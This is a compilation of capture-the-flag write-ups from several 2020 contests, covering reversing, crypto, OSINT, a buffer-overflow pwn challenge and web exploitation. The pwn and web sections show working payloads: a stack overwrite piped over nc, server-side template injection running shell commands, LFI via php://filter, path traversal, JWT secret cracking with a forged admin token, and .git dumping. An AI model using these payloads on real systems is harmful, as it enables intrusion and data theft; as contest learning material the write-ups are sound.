# Qwerky Qwerty---## ApproachQwerty is a standard keyboard design(array). There are several Keyboard design and this statement is maybe written by Qwerky.
```Oh no... whays.. ,dats hall.bing yr me... nr br brw ,df M>vv ,df BR |
Welcome! We're trying to hack into Burke Defense Solutions & Management, and we need your help. Can you help us find a disgruntled former employee somewhere on the internet (their URL will be the flag)?https://theinternet.ctf.umbccd.io/
On reading the description we know we have to find out about a rogue employee, by going through the Truman Gritzwald CEO’s facespace page we find out that he is about to fire his CFO, then we find out about his CISO Madalyn Burke, through her facespace page we find out about facespace CTO Royce joyce, through his page we find out about the entire team, after a lot of searching: On Tristen Winter’s page we learn about a employee who’s messages we should ignore.
On Rudy Grizwald’s page, the flag is in the URL.
Flag: DawgCTF{RudyGrizwald}
View the full writeup [here](https://github.com/abhichitkara/DawgCTF20-Writeups/blob/master/DawgCTF%20Writeups.pdf) |
# Man these spot the difference games are getting hard---## ApproachI got the crypt information and cipher text from server.So decrypt cipher text and return server.```-----------------------------------------------------------------------Welcome to DiffSpot, a new Spot the Differnce Game sponsored by DawgSec You'll be presented with a variety of encoded data, all of which will be of the form DogeCTF{}Possible ciphers include:- rot13- rot16- base64- base32- base16- atbash- affine with b=6, a=9- railfence with key=3 Your job is to decode the flag and send it back to us Seems easy enough right?-----------------------------------------------------------------------RG9nZUNURntSbWpsV0lhTllmTHR0c3RYUXVoWUpBa3l2VGx5emtDUn0=```
## SolutionUsing Man_these_solve.py
## Flag```DawgCTF{w@iT_th3y_w3r3_d1ff3rent?!}``` |
# OldSchool
The challenge is made up of 2 parts, each one yields a part of the flag
## Part 1
we're given 3 files:* a picture* `Wqv Lvf xp "hnovIvo"`* `hzdk{z_whg_mry_`
in the description they said that the one encrypted the flag used a method he learned in france, and since this is classical crypto, it's gotta be viginere or one of it's variants.
By messing around with the first text, i realised that it's a substitution cipher, with some intuition you get `Wqv Lvf xp == The Key is`, and we can notice that the flag is in flag format, meaning that `hzdk == flag`, we'll use this to get five letters of `hnovIvo`(because `v` is repeated twice), further more, `z` is a single word, meaning it can be either `a` or `i`, by using this, we can get the remaining letters:* by using `hzdk == flag`, we can reverse-decrypt `hzdk` by using `flag` as key, which yields the original key `code`, so `hnoz == code`* by using `z == i`, we get the fifth letter of the key in the same way as the other four, which is `R`, so the key so far is `codeRe*`, from here we can guess it, it's `codeRed`, we'll use it to decrypt the first part and we get ```flag{i_see_you_```
## Part 2for this part we're given an encoded string, the description for this part said that the flag was encoded twice with different encodings, and that the one who encoded the flag said *the average is 74.5*.the encoded string is```=]e7A=>F&G@TRAe@9#X>=>OH3:,6Kp:,6I.=F*;T>"1M.;+PJ |
No captcha required for preview. Please, do not write just a link to original writeup here. [Link](https://hell38vn.wordpress.com/2020/04/14/ctf-tghack-2020-web-exfiltration-150pt/) |
TLDR;- Encryption oracle where the message is encrypted by evaluating it on some polynomial in $\mathbb{F}_P[x]$ with prime $P$- Constant term of the polynomial is the flag- We have as many encryptions as we like- Use polynomial interpolation to recover the coefficients and get the flag- (note) Asking for the encryption of $P$ itself is not allowed. If it were, the encryption would be the flag
[writeup](https://jsur.in/posts/2020-04-14-hexionctf-2020-writeups) |
# AUCTF 2020<div align="center"></div>
AUCTF 2020 has ended, and me and my team [**P1rates**](https://ctftime.org/team/113157) really enjoyed it as it was full of good problems, I participated as **T1m3-m4ch1n3** and here's my writeup about some of the problems that i solved.*(if you're interested in the rest you can read the writeup of my teammate **y4mm1** [here](https://ah-sayed.github.io/posts/auctf-2020))*
## Challenges
| Title | Category || --------------------------------------------|--------------:|| [Cracker Barrel](#cracker-barrel) | Reversing || [Mr. Game and Watch](#mr-game-and-watch) | Reversing || [Sora](#sora) | Reversing || [Don't Break Me](#dont-break-me) | Reversing || [Thanksgiving Dinner](#thanksgiving-dinner) | Pwn |
---
## Cracker Barrel#### Reversing
### Description:> **I found a USB drive under the checkers board at cracker barrel. My friends told me not to plug it in but surely nothing bad is on it?> I found this file, but I can't seem to unlock it's secrets. Can you help me out?> Also.. once you think you've got it I think you should try to connect to challenges.auctf.com at port 30000 not sure what that means, but it written on the flash drive..> [cracker_barrel](cracker%20barrel/cracker_barrel)**
### Solution:
Firstly we start by `strings` command and obviously the flag isn't there so we do `file` command we will find it's ELF 64-bit, dynamically linked and not stripped.
let's do some radare2 stuff```$ r2 -AA cracker_barrel[0x00001180]> afl```
well, here we find some interesting function names like:```mainsym.checksym.check_1sym.check_2sym.check_3sym.print_flag```
then seeking to the main and entering the visual mode:```[0x00001180]> s main[0x000012b5]> VV```
we notice that main calls sym.check and then `test eax, eax` and the `je` if it's false then it calls sym.print_flag .. So whatever happens inside check() function it MUST return a non-zero value so we can get the flag!
By digging into check() function we see clearly the it takes the user input and calls check_1() function and if the return is zero it returns zero (which we don't need to happend), Otherwise it continues to call the second check which is check_2() and so on with check_3() .. so we need to make sure to return a non-zero value from these functions too
Now going deeper inside check_1():
<div align="center"></div>
as we see clearly it takes the user input in s1 variable, then "starwars" in s2 and compares them if they're equal then it goes to the second check which compares the user input with "startrek" if they're NOT equal it returns 1
So all we need to do is passing "starwars" as first input and by that we passed the first check!
Now we go to check_2() function in visual mode we'll find there's a string "si siht egassem terces" that get modified by some operations and then compared to our second input
<div align="center"></div>
as seen in the photo above we can make a breakpoint in the `cmp` instruction and examine the 2 stringsI'll use gdb for the debugging:```$ gdb cracker_barrel(gdb) set disassembly-flavor intel(gdb) disass check_2 .. 0x0000000000001553 <+132>: mov rsi,rdx 0x0000000000001556 <+135>: mov rdi,rax 0x0000000000001559 <+138>: call 0x1130 ..
(gdb) b *check_2+138Breakpoint 1 at 0x1559
(gdb) rGive me a key!starwarsYou have passed the first test! Now I need another key!AAAA
Breakpoint 1, 0x0000555555555559 in check_2 ()```
Now we hit the breakpoint on the comparing point now by examining rsi and rdi:```(gdb) x/wx $rsi0x7fffffffc540: 0x41414141(gdb) x/2wx $rdi0x555555559420: 0x73692073 0x00000000```
Clearly rsi is our input and rdi is how our input must be! which represents "s is" as a string (in little endian)!And this our second input!
Now heading to our final check which is check_3 function() in visual mode .. we se a string "z!!b6~wn&\`" passed seperately to variablesthen it iterates through each character in the user input string and encrypt it as follows:
<div align="center"></div>
The encryption method:- take each character and add 0x2 to its hexadecimal value- XOR the result with 0x14
And then compare the n-th character in the resulting string with the n-th character in "z!!b6\~wn&\`" string.Our goal now is clear which is to decrypt "z!!b6\~wn&\`" string:```pythonsecret = "z!!b6~wn&`"result = ""
for c in secret: result += chr((ord(c) ^ 0x14) - 0x2)
print(result)```
Now by running it:```bash$ python3 decrypt.pyl33t hax0r```
And that's our third input!Now by connecting to the server to get the flag:```$ nc challenges.auctf.com 30000Give me a key!starwarsYou have passed the first test! Now I need another key!s isNice work! You've passes the second test, we aren't done yet!l33t hax0rCongrats you finished! Here is your flag!auctf{w3lc0m3_to_R3_1021}```
Flag: `auctf{w3lc0m3_to_R3_1021}`
---
## Mr. Game and Watch#### Reversing
### Description:> **My friend is learning some wacky new interpreted language and different hashing algorithms. He's hidden a flag inside this program but I cant find it...> He told me to connect to challenges.auctf.com 30001 once I figured it out though.> [mr_game_and_watch.class](mr.%20game%20and%20watch/mr_game_and_watch.class)**
### Solution:First, we need to decompile the .class file to get its java source .. i used [CFR java decompiler](https://www.benf.org/other/cfr/):
```bash$ java -jar ~/cfr-0.149.jar mr_game_and_watch.class > mr_game_and_watch.java```
and this was the resulting source code:
```javaimport java.io.BufferedReader;import java.io.FileReader;import java.io.IOException;import java.security.MessageDigest;import java.util.Arrays;import java.util.Scanner;
public class mr_game_and_watch { public static String secret_1 = "d5c67e2fc5f5f155dff8da4bdc914f41"; public static int[] secret_2 = new int[]{114, 118, 116, 114, 113, 114, 36, 37, 38, 38, 120, 121, 33, 36, 37, 113, 117, 118, 118, 113, 33, 117, 121, 37, 119, 34, 118, 115, 114, 120, 119, 114, 36, 120, 117, 120, 38, 114, 35, 118}; public static int[] secret_3 = new int[]{268, 348, 347, 347, 269, 256, 348, 269, 256, 256, 344, 271, 271, 264, 266, 348, 257, 266, 267, 348, 269, 266, 266, 344, 267, 270, 267, 267, 348, 349, 349, 265, 349, 267, 256, 269, 270, 349, 268, 271, 351, 349, 347, 269, 349, 271, 257, 269, 344, 351, 265, 351, 265, 271, 346, 271, 266, 264, 351, 349, 351, 271, 266, 266}; public static int key_2 = 64; public static int key_3 = 313;
public static void main(String[] arrstring) { System.out.println("Welcome to the Land of Interpreted Languages!"); System.out.println("If you are used to doing compiled languages this might be a shock... but if you hate assembly this is the place to be!"); System.out.println("\nUnfortunately, if you hate Java, this may suck..."); System.out.println("Good luck!\n"); if (mr_game_and_watch.crackme()) { mr_game_and_watch.print_flag(); } }
private static boolean crackme() { Scanner scanner = new Scanner(System.in); if (mr_game_and_watch.crack_1((Scanner)scanner) && mr_game_and_watch.crack_2((Scanner)scanner) && mr_game_and_watch.crack_3((Scanner)scanner)) { System.out.println("That's correct!"); scanner.close(); return true; } System.out.println("Nope that's not right!"); scanner.close(); return false; }
private static boolean crack_1(Scanner scanner) { System.out.println("Let's try some hash cracking!! I'll go easy on you the first time. The first hash we are checking is this"); System.out.println("\t" + secret_1); System.out.print("Think you can crack it? If so give me the value that hashes to that!\n\t"); String string = scanner.nextLine(); String string2 = mr_game_and_watch.hash((String)string, (String)"MD5"); return string2.compareTo(secret_1) == 0; }
private static boolean crack_2(Scanner scanner) { System.out.println("Nice work! One down, two to go ..."); System.out.print("This next one you don't get to see, if you aren't already digging into the class file you may wanna try that out!\n\t"); String string = scanner.nextLine(); return mr_game_and_watch.hash((String)string, (String)"SHA1").compareTo(mr_game_and_watch.decrypt((int[])secret_2, (int)key_2)) == 0; }
private static boolean crack_3(Scanner scanner) { System.out.print("Nice work! Here's the last one...\n\t"); String string = scanner.nextLine(); String string2 = mr_game_and_watch.hash((String)string, (String)"SHA-256"); int[] arrn = mr_game_and_watch.encrypt((String)string2, (int)key_3); return Arrays.equals(arrn, secret_3); }
private static int[] encrypt(String string, int n) { int[] arrn = new int[string.length()]; for (int i = 0; i < string.length(); ++i) { arrn[i] = string.charAt(i) ^ n; } return arrn; }
private static String decrypt(int[] arrn, int n) { Object object = ""; for (int i = 0; i < arrn.length; ++i) { object = (String)object + (char)(arrn[i] ^ n); } return object; }
private static void print_flag() { String string = "flag.txt"; try (BufferedReader bufferedReader = new BufferedReader(new FileReader(string));){ String string2; while ((string2 = bufferedReader.readLine()) != null) { System.out.println(string2); } } catch (IOException iOException) { System.out.println("Could not find file please notify admin"); } }
public static String hash(String string, String string2) { String string3 = null; try { MessageDigest messageDigest = MessageDigest.getInstance(string2); byte[] arrby = messageDigest.digest(string.getBytes("UTF-8")); StringBuilder stringBuilder = new StringBuilder(2 * arrby.length); for (byte by : arrby) { stringBuilder.append(String.format("%02x", by & 0xFF)); } string3 = stringBuilder.toString(); } catch (Exception exception) { System.out.println("broke"); } return string3; }}```
After reading the source code we clearly see that in order to call print_flag() function crackme() function MUST return true which will happen only if crack_1(), crack_2() and crack_3() functions are true .. So let's make those guys true!
- crack_1():``` java private static boolean crack_1(Scanner scanner) { System.out.println("Let's try some hash cracking!! I'll go easy on you the first time. The first hash we are checking is this"); System.out.println("\t" + secret_1); System.out.print("Think you can crack it? If so give me the value that hashes to that!\n\t"); String string = scanner.nextLine(); String string2 = mr_game_and_watch.hash((String)string, (String)"MD5"); return string2.compareTo(secret_1) == 0; }```
That's easy .. the input gets encrypted using MD5 and then compared to secret_1 variable if they're equal it returns truewe need to decrypt secret_1 value and that will be our first key!
I used this [site](https://hashtoolkit.com/decrypt-hash/) for that:
<div align="center"></div>
Nice! `masterchief` is our first input we got one .. two to go!
- crack_2():```java private static boolean crack_2(Scanner scanner) { System.out.println("Nice work! One down, two to go ..."); System.out.print("This next one you don't get to see, if you aren't already digging into the class file you may wanna try that out!\n\t"); String string = scanner.nextLine(); return mr_game_and_watch.hash((String)string, (String)"SHA1").compareTo(mr_game_and_watch.decrypt((int[])secret_2, (int)key_2)) == 0; }```
Well, here it takes our input -> encrypt it using SHA1 -> compare it to the decrypted secret_2 value using decrypt() function
Now by thinking reverse! we need to: decrypt secret_2 value -> decrypt the result using SHA1 -> and that's our input!
The equivalent python code of decrypt() function is:
```pythonsecret = [114, 118, 116, 114, 113, 114, 36, 37, 38, 38, 120, 121, 33, 36, 37, 113, 117, 118, 118, 113, 33, 117, 121, 37, 119, 34, 118, 115, 114, 120, 119, 114, 36, 120, 117, 120, 38, 114, 35, 118]
key = 64
def decrypt(a, k): result = "" for i in range (0, len(a)): result += chr(a[i] ^ k)
return result
print(decrypt(secret, key))```
Now running it:
```bash$ python3 decrypt.py264212deff89ade15661a59e7b632872d858f2c6```
Now decrypting this SHA1 using the same [site](https://hashtoolkit.com/decrypt-hash/):
<div align="center"></div>
Great! `princesspeach` is our second input .. only one left!
- crack_3():```java
private static boolean crack_3(Scanner scanner) { System.out.print("Nice work! Here's the last one...\n\t"); String string = scanner.nextLine(); String string2 = mr_game_and_watch.hash((String)string, (String)"SHA-256"); int[] arrn = mr_game_and_watch.encrypt((String)string2, (int)key_3); return Arrays.equals(arrn, secret_3); }```
So it takes our input -> encrypt it using SHA256 -> encrypt it using encrypt() function -> compare the result with secret_3 array
thinking reverse we should: take the secret_3 array -> decrypt it using the reverse of encrypt() function -> decrypt the resulting SHA256 hash
The encrypt() function just XOR each character with 313 value and that's the equivalent python code:```pythonsecret = [268, 348, 347, 347, 269, 256, 348, 269, 256, 256, 344, 271, 271, 264, 266, 348, 257, 266, 267, 348, 269, 266, 266, 344, 267, 270, 267, 267, 348, 349, 349, 265, 349, 267, 256, 269, 270, 349, 268, 271, 351, 349, 347, 269, 349, 271, 257, 269, 344, 351, 265, 351, 265, 271, 346, 271, 266, 264, 351, 349, 351, 271, 266, 266]
key = 313
def decrypt(a, n): myStr = "" for i in range (0, len(a)): myStr += chr(a[i] ^ key)
return myStr
print(decrypt(secret, key))```
Now running it:```bash$ python3 decrypt2.py5ebb49e499a6613e832e433a2722edd0d2947d56fdb4d684af0f06c631fdf633```
Then i used this [site](https://md5decrypt.net/en/Sha256/) to decrypt the result:
<div align="center"></div>
Finally! Our third input is `solidsnake`
Now connecting to the server:```$ nc challenges.auctf.com 30001
Welcome to the Land of Interpreted Languages!If you are used to doing compiled languages this might be a shock... but if you hate assembly this is the place to be!
Unfortunately, if you hate Java, this may suck...Good luck!
Let's try some hash cracking!! I'll go easy on you the first time. The first hash we are checking is this d5c67e2fc5f5f155dff8da4bdc914f41Think you can crack it? If so give me the value that hashes to that! masterchiefNice work! One down, two to go ...This next one you don't get to see, if you aren't already digging into the class file you may wanna try that out! princesspeachNice work! Here's the last one... solidsnakeThat's correct!auctf{If_u_h8_JAVA_and_@SM_try_c_sharp_2922}```
Flag: `auctf{If_u_h8_JAVA_and_@SM_try_c_sharp_2922}`
---
## Sora#### Reversing
### Description:> **This obnoxious kid with spiky hair keeps telling me his key can open all doors.> Can you generate a key to open this program before he does?> Connect to challenges.auctf.com 30004> [sora](sora/sora)**
### Solution:As usual using `file` command it appears it's a 64-bit ELF file, dynamically linked and not strippedand with `strings` command we find an interesting part:
```$ strings sora..aQLpavpKQcCVpfcgGive me a key!That's not it!flag.txtToo bad you can only run this exploit on the server.....```
as a first assumption maybe `aQLpavpKQcCVpfcg` string is some sort of an encrypted key or something
Alright, let's put this into radare2```$ r2 -AA sora[0x00001140]> afl..0x000012dd 7 171 sym.encrypt0x00001430 4 101 sym.__libc_csu_init0x00001229 6 180 main..
[0x00001140]> s main[0x00001229]> VV```In the visual mode we can see the encrypt() function gets called after the user enters an input:
<div align="center"></div>
If eax register does NOT equal zero then it prints the flag .. whatever happens in encrypt() function it MUST returns a non-zero value
Now moving to IDA pro to see the decompilation of encrypt() function:
<div align="center"></div>
The function simply encrypts the character and if it doesn't equal the equivalent character in the secret variable it return 0 which we don't want to happen
the secret variable has the value of our interesting string `aQLpavpKQcCVpfcg`:
<div align="center"></div>
Now i wrote this python script which iterates through each character in the secret variable string and finds the printable character that satisfies the if condition:
```pythonsecret = "aQLpavpKQcCVpfcg"
def getkeychar(a):
# iterates through the printable characters only for x in range(ord(' '), ord('~')): if chr((8 * x + 19)%61 + 65) == a: return chr(x)
key = ""for i in range (0, len(secret)): key += getkeychar(secret[i])
print(key)
```
Now running it gives us the key:```$ python3 key.py75<"72"%5($."0(G```
Now connecting to the server:```$ nc challenges.auctf.com 30004Give me a key!75<"72"%5($."0(Gauctf{that_w@s_2_ezy_29302}```
Flag: `auctf{that_w@s_2_ezy_29302}`
---
## Don't Break Me#### Reversing
### Description:> **I've been working on my anti-reversing lately. See if you can get this flag!> Connect at challenges.auctf.com 30005> [dont_break_me](don't%20break%20me/dont_break_me)**
### Solution:Alright, with `file` command we know it's 32-bit ELF file, dynamically linked and not stripped .. and with `strings` command there's nothing interesting
Now it's time for radare2:
```$ r2 -AA dont-break-me[0x000010e0]> afl..0x000015a1 7 224 sym.decrypt0x0000138a 6 102 sym.get_string0x000014cf 7 210 sym.encrypt0x00001681 6 117 sym.inverse0x00001272 4 280 main..```
Those function names sound interesting let's start with main() function:
<div align="center"></div>
It seems that the program takes the user input then removes the newline character at the end, then pushes it as an argument to encrypt() function and put the result in s2 variable .. after that it allocates a new memory using calloc() built-in function and returns the address to s1 which is passed to get_string() function as an argument to load a string .. afterwards there's a compare so s1 MUST be equal s2
So overall we need to reverse that as follows:- See the get_string() function and get the string which is loaded to s1- Decrypt that string using decrypt() function- Input the result in order to get the flag
So far so good .. we'll start with decompiling get_string() function using IDA pro:
<div align="center"></div>
It's clear that it iterates from 0 to 31 and with this if condition it only loads the even indexed characters (e.x. 0, 2, 4, ...) from blah variable **backwoards** in the a1 variable
And this is the value of blah variable:
<div align="center"></div>
Which is `XAPRMXCSBCEDISBVXISXWERJRWSZARSQ`
Next, the decrypt() function:
<div align="center"></div>
Clearly, it takes the user input string with two argument which, from analysing the code, are 12, 17 consecutively then iterates through each character and decrypt it using a formula which appears to be the [Affine Cipher](https://en.wikipedia.org/wiki/Affine_cipher)
Finally the inverse() function:
<div align="center"></div>
Simple enough! .. Now by combining our understanding of the previous functions i came up with this python script which is equivalent of all we said```pythondef get_string(s): u = list(s) result = []
for i in range (0, len(u)): if i % 2 == 0: result.append(u[i])
result.reverse() return ''.join(result)
def inverse(a): n = 0 for i in range (0, 26): if i * a % 26 == 1: n = i
return n
def decrypt(s, a, k): x = ""
inv = inverse(a)
for i in s: # check if the character is a space if ord(i) == 32: x += i else: x += chr(inv * (ord(i) + 65 - k)%26 + 65) return x
secret = "XAPRMXCSBCEDISBVXISXWERJRWSZARSQ"a = 17k = 12
secret = get_string(secret)
key = decrypt(secret, a, k)
print(key)```
Now by running this script it should give us the key:
```$ python3 decrypt.pyIKILLWITHMYHEART```
Now connecting to the server:
```$ nc challenges.auctf.com 3000554 68 65 20 6d 61 6e 20 69 6e 20 62 6c 61 63 6b 20 66 6c 65 64 20 61 63 72 6f 73 73 20 74 68 65 20 64 65 73 65 72 74 2c 20 61 6e 64 20 74 68 65 20 67 75 6e 73 6c 69 6e 67 65 72 20 66 6f 6c 6c 6f 77 65 64 2eInput: IKILLWITHMYHEARTauctf{static_or_dyn@mIc?_12923}```
Flag: `auctf{static_or_dyn@mIc?_12923}`
---
## Thanksgiving Dinner#### Pwn
### Description:> **I just ate a huge dinner. I can barley eat anymore... so please don't give me too much!> nc challenges.auctf.com 30011> Note: ASLR is disabled for this challenge> [turkey](thanksgiving%20dinner/turkey)**
### Solution:Nice! by doing `file` command we know it's 32-bit ELF file, dynamically linked and not strippedand with `strings` command nothing really interesting
And with radare2:```$ r2 -AA turkey[0x000010c0]> afl..0x000011f9 1 87 main0x00001250 7 198 sym.vulnerable..```
Those are interesting functions .. the main only puts a text and then calls vulnerable() function which makes 5 checks if they're all true it prints out the flag!:
<div align="center"></div>
We go to gdb-peda for a better memory examine and debugging:
```gdb-peda$ set disassembly-flavor intelgdb-peda$ disass vulnerable```
<div align="center"></div>
We see fgets length is 0x24 which is 36, so we put a breakpoint after fgets that will allow us to examine the memory right after we enter the input.
And by running the file and enters `AAAA` as input:
<div align="center"></div>
We can see that eax register is pointing to 0xbffff14c address and by examining the memory at this location and all the addresses in the comparisons:
<div align="center"></div>
GREAT! Now we can overwrite those values to pass the checks .. and these are the 5 checks:
<div align="center"></div>
-  0xbffff16c MUST EQUAL 0x1337-  0xbffff168 MUST BE LESS THAN 0xffffffec (= -20)-  0xbffff160 MUST NOT EQUAL 0x14-  0xbffff164 MUST EQUAL 0x667463-  0xbffff15c MUST EQUAL 0x2a
Now our payload is:
```python>>> from pwn import p32>>> 'A'*16 + p32(0x2a) + p32(0x20) + p32(0x667463) + p32(0xffffffec - 10) + p32(0x1337)'AAAAAAAAAAAAAAAA*\x00\x00\x00 \x00\x00\x00ctf\x00\xe2\xff\xff\xff7\x13\x00\x00'```
Now we can pipe it to the server:
```$ python -c "print 'AAAAAAAAAAAAAAAA*\x00\x00\x00 \x00\x00\x00ctf\x00\xe2\xff\xff\xff7\x13\x00\x00'" | nc challenges.auctf.com 30011Hi!Welcome to my program... it's a little buggy...Hey I heard you are searching for flags! Well I've got one. :)Here you can have part of it!auctf{
Sorry that's all I got!
Wait... you aren't supposed to be here!!auctf{I_s@id_1_w@s_fu11!}```
Flag: `auctf{I_s@id_1_w@s_fu11!}` |
No captcha required for preview. Please, do not write just a link to original writeup here. [LINK](https://hell38vn.wordpress.com/2020/04/14/ctf-tghack-2020-misc-poke-142pt/) |
# Elf in the Elf1. Given 4408 ELF files, let's see what they do.2. Just look at elf_1, we can find that if we input 'E', it will response `Correct`3. Other ELF files are doing the same work, so just find all the solution and then arrange them in the order of the file name id (elf_0, elf_1, ...)4. We can find that it is turned into another elf file!5. Just run the elf file and it will output the flag.`DawgCTF{sw@g_1n_th3_fl@g}`
* Note: There are some elf files have no solution(54, 82, 152, ...), because the type of the parameter of the function `math` is char, but the constraint is not in the range of -128~128. However, we still have to fill into these solutions with a char to get a complete elf file. |
<h1 align="center">Web Exploitation</h1>
<h3>Hot Access 70 points</h3>
Access to all the latest modules, hot off the press! What can you access?
Connect here: http://jh2i.com:50016
```shell
http://jh2i.com:50016/?m=modules/../.htaccess
<Directory /var/www/html>
Options Indexes FollowSymLinks MultiViews AllowOverride All Order allow,deny allow from all </Directory>
<Directory /var/www/html/sshh_dont_tell_i_hid_the_flag_here> AllowOverride All </Directory>
http://jh2i.com:50016/sshh_dont_tell_i_hid_the_flag_here/flag.txtLLS{htaccess_can_control_what_you_access}
Flag: LLS{htaccess_can_control_what_you_access}```
<h3>PHPJuggler 80 points</h3>
PHP is here to entertain again! They’ve shown you magic tricks, disappearing acts, and now… juggling!
Connect here: http://jh2i.com:50030.
``` shellPhp Type Juggling strcmp:
submit POST requests with flag[]=flagWarning: strcmp() expects parameter 1 to be string, array given in /var/www/html/index.php on line 6You got it! That's the correct flag!LLS{php_dropped_the_ball_again}
Flag: LLS{php_dropped_the_ball_again}```
<h3>Magician 80 points</h3>
Show me a hat trick!
Connect here: http://jh2i.com:50000
``` shellMagic Hash as whihehat security or 247CTF!!!:
hash ==> 0e908377363673038390833004129775password ==> f789bbc328a3d1a3e4UPoL
Flag: LLS{magic_hashes_make_for_a_good_show}```
<h3>GLHF 90 points</h3>
LMFAO! FLAG PLZ, THX!
Connect here: http://jh2i.com:50014
``` shellLocal file inclusion: LFI:
http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=index
http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=FLAG
<html> <head> <title> PHPLFIXYZ </title> </head> <body>
<h1> FLAG???? </h1>
<h1> WTF, PLZ??? </h1>
</body></html>
Flag: LLS{lmfao_php_filters_ftw}```
<h3>MASK 90 points</h3>
Take off your mask.
Connect here: http://jh2i.com:50023.
``` shellServer Side Template Injection:
test ==> {{7*7}} response 49
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}```
``` shell{{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}
Flag: LLS{server_side_template_injection_unmasked}```
<h3>JaWT 90 points</h3>
Check the admin's scratchpad!
Connect here: http://jh2i.com:50019/
``` shellChallenge as PicoCTF and use crackjwt.py
FOR JOHNpython crackjwt.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc" /media/sf_D_DRIVE/WORDLISTS/rockyou.dicCracking JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc1648it [00:00, 6560.78it/s]('Found secret key:', 'fuckit')
FOR ADMINeyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.qfSqP1u-gAhG6r8Vfb31Fi5WkjYCxjRKhFEcLCde8O0
Change value of cookie jwt
Hello admin!
Here is your JaWT scratchpad!
LLS{jawt_was_just_what_you_thought}
Flag: LLS{jawt_was_just_what_you_thought}```
<h3>10 Character Web Shell 100 points</h3>
Only 10 char--
Connect here: http://jh2i.com:50001.
``` shell
http://jh2i.com:50001/?c=cat%20flag*```
``` shellFlag: LLS{you_really_can_see_in_the_dark}```
<h3>Dairy Products 100 points</h3>
There is a new advertising campaign on the classic dairy company’s website. You need to steal their latest product.
Connect here: http://142.93.3.19:50008
```shellJust use wget because gitdumper.sh don't download repo.
wget -r --no-parent http://142.93.3.19:50008/.git/
git statusgit --no-pager log -p | grep LLS{LLS{you_gitm_gotm_good_partner}
Flag: LLS{you_gitm_gotm_good_partner}```
<h3>GET Encoded 125 points</h3>
I don't GET this%21 Do you%3F
Connect here: http://jh2i.com:50013
```shellrobots.txt with /?debug```
```shellhttp://jh2i.com:50013/?%73ystem=ls
flag_that_you_could_never_guess.phpindex.phprobots.txt
Machines hunt for more than humans do.
http://jh2i.com:50013/?%73ystem=cat%20flag%5fthat%5fyou%5fcould%5fnever%5fguess.php
Machines hunt for more than humans do.
Machines hunt for more than humans do.
Flag: LLS{i_gotcha_url_encoding}```
Return to the main menu
Return to the main menu |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.